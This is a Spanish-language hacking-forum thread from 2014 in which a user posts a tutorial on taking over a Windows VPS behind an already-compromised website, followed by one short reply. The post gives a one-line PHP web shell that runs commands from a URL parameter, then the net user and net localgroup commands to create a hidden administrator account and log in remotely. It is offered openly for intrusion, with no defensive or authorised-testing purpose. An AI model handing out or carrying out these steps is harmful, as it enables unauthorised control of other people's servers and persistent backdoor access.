• Auditoria Web

  • Aquí se discutirán las principales técnicas usadas para auditar las aplicaciones web, técnicas como SQL Injection, XSS, CSRF, etc.
Aquí se discutirán las principales técnicas usadas para auditar las aplicaciones web, técnicas como SQL Injection, XSS, CSRF, etc.
 #459499  por PYE_YST
 13 Nov 2014, 04:38
Hola amigos, en este pequeño post enseñare algo bastante sencillo que es rootear un servidor VPS en este caso sera Windows.
Bueno lo primero tendríamos que tener una web vulnerada con un servidor Windows, Si tenemos suerte la web estará alojada en una VPS. (Tendremos que tener una Shell dentro)

Ahora lo primero que tendríamos que hacer es buscar un lugar donde se pueda ejecutar comandos, Si nuestra Shell no tiene un lugar donde podamos ejecutar comandos tendremos que crear un archivo .php con el siguiente código: "<?php system ($_GET[vector]); ?>" sin comillas.

Servirá para ejecutar comandos system, tendremos que dirigirnos a "www.web.com?cmd=whoami"Servirá para ver si tenemos privilegios en el sistema, Si no sale nada es que el servidor no tienen ninguna VPS, ahora lo que tendríamos que hacer es ejecutar el siguiente comando: net user
después de ejecutar el siguiente comando saldrán 2 usuarios: El administrador y el invitado.

Ahora añadimos nuestro usuario con el siguiente comando: "net user usuario clave1 /add" sin comillas.
después de eso tendríamos que darle privilegios de administrador a nuestro usuario. Tendríamos que ver los usuarios: Si los usuarios son Administrator / Guest entonces tendríamos que ejecutar: "net localgroup Administrators usuario /add" sin comillas, pero si los usuarios fueran Administrador / Invitado tendríamos que ejecutar: "net localgroup Adminitradores usuario /add" sin comillas.

Ahora ejecutaremos el comando: "net user" sin comillas y verificaremos que nuestro usuario tiene correctamente privilegios de administrador.
Procederemos a hacer conexión al servidor VPS con la ip del servidor que se puede ver de la shell o simplemente ejecutando el siguiente comando: "ipconfig" sin comillas.

Ahora iniciamos conexión al servidor VPS mediante conexión remota y pondremos el usuario y clave de comienzo y estaremos logueados con éxito dentro del servidor VPS.
Este fue un post bastante sencillo, adiós.
 #462241  por xxxPoseidonxxx
 08 Ene 2015, 06:17
Podrias haber hecho el tuto mas currado...